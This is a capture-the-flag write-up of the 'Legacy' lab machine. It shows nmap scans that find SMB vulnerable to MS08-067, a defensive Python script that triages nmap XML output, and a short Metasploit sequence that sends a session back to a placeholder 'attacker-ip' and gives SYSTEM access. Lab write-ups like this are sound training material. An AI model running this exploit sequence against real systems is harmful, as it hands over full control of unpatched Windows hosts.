Hands-On Windows SMB Exploitation: Unleashing the Legacy CTF Challenge

Legacy

Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows.


BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Service Enumeration

Behind Security performed an nmap scan on 10.10.10.4 and was able to identify that TCP ports 135, 139, and 445 are open.

Command: nmap -sV -sC -T4 10.10.10.4 -v -Pn

Note the -Pn flag: it tells nmap to skip host discovery and treat the target as up, scanning ports regardless of whether the host answers a ping. This matters here because the target machine does not respond to ICMP requests, so without -Pn nmap would report the host as down and scan nothing.

SMB Enumeration

Behind Security conducted an Nmap scan with the vulnerability detection scripts from the NSE (Nmap Scripting Engine). The command used for the scan was: nmap -sV --script=vuln -T4 10.10.10.4 -p135,139,445 -v -Pn, and the results are provided below.

The output tells Behind Security that the SMB server is vulnerable to ms08-067 Remote Code Execution (RCE).
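The two scans above produce a lot of text when run across a network rather than a single host. The following script is an added example, not part of the original write-up: it parses the XML that nmap writes with -oX, lists which hosts expose the SMB-related ports (TCP 135, 139, 445), and flags any host on which an NSE vuln script such as smb-vuln-ms08-067 reported a VULNERABLE state, so a defender can prioritise patching. The embedded XML is a constructed sample shaped like real nmap output (two hosts, one exposed and one filtered), not a capture of the author's scan.

```python
"""Triage nmap -oX output for exposed SMB services and NSE vuln findings.

Added example, not the write-up's own code. SAMPLE_XML is a constructed
document in the shape nmap produces; the 10.10.10.4 host mirrors the
write-up's findings, the second host is filtered and only there for contrast.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# RPC endpoint mapper, NetBIOS session service, SMB over TCP
SMB_PORTS = {135, 139, 445}

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script=vuln -p135,139,445 -Pn 10.10.10.4">
  <host>
    <status state="up"/>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms08-067" output="VULNERABLE">
        <table key="CVE-2008-4250">
          <elem key="state">VULNERABLE</elem>
          <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""


@dataclass
class HostFinding:
    addr: str
    open_smb_ports: list = field(default_factory=list)
    # NSE script id -> the vuln table key (normally the CVE id) it reported as VULNERABLE
    vulnerable: dict = field(default_factory=dict)


def parse_nmap_xml(xml_text: str) -> list:
    """Walk every <host> and collect open SMB ports plus VULNERABLE script results."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        finding = HostFinding(addr=addr_el.get("addr"))
        for port in host.findall("ports/port"):
            state = port.find("state")
            port_id = int(port.get("portid"))
            if (port.get("protocol") == "tcp" and state is not None
                    and state.get("state") == "open" and port_id in SMB_PORTS):
                finding.open_smb_ports.append(port_id)
        # vuln-library scripts emit one <table key="CVE-..."> per check with an elem key="state"
        for script in host.findall("hostscript/script"):
            for table in script.findall("table"):
                state_el = table.find("elem[@key='state']")
                if state_el is not None and state_el.text == "VULNERABLE":
                    finding.vulnerable[script.get("id")] = table.get("key")
        findings.append(finding)
    return findings


def triage(findings: list) -> list:
    """Return (addr, severity, note) tuples, riskiest host first."""
    rows = []
    for f in findings:
        if f.vulnerable:
            severity = "critical"
            note = ", ".join(f"{sid} ({key})" for sid, key in sorted(f.vulnerable.items()))
        elif f.open_smb_ports:
            severity = "review"
            note = "SMB reachable on " + ",".join(map(str, sorted(f.open_smb_ports)))
        else:
            severity = "info"
            note = "no open SMB ports"
        rows.append((f.addr, severity, note))
    order = {"critical": 0, "review": 1, "info": 2}
    return sorted(rows, key=lambda r: order[r[1]])


if __name__ == "__main__":
    for addr, severity, note in triage(parse_nmap_xml(SAMPLE_XML)):
        print(f"{addr:15} {severity:9} {note}")
```

Replacing SAMPLE_XML with the contents of a real -oX file is the only change needed to run this against your own scan; hosts where SMB is reachable but no script fired land in the "review" bucket, which is where unpatched but unscanned systems usually hide.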

Initial Access – Remote Code Execution (CVE-2008-4250)

Vulnerability Explanation: The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. The vulnerability was addressed as CVE-2008-4250 and more information can be found here.

Vulnerability Fix: Microsoft has released a patch to fix this known issue. You can see more information here.

Severity: Critical

Steps to Reproduce the Attack: A Metasploit module for this vulnerability is publicly available.

msf6> use exploit/windows/smb/ms08_067_netapi
msf6> set RHOSTS 10.10.10.4
msf6> set LHOST attacker-ip
msf6> set TARGET 6
msf6> run

Post-Exploitation

The SMB server is running as SYSTEM, and a successful exploit would result in a remote attacker gaining administrative privileges on the machine.

Proof of Exploitation: REDACTED user.txt
Proof of Exploitation: REDACTED root.txt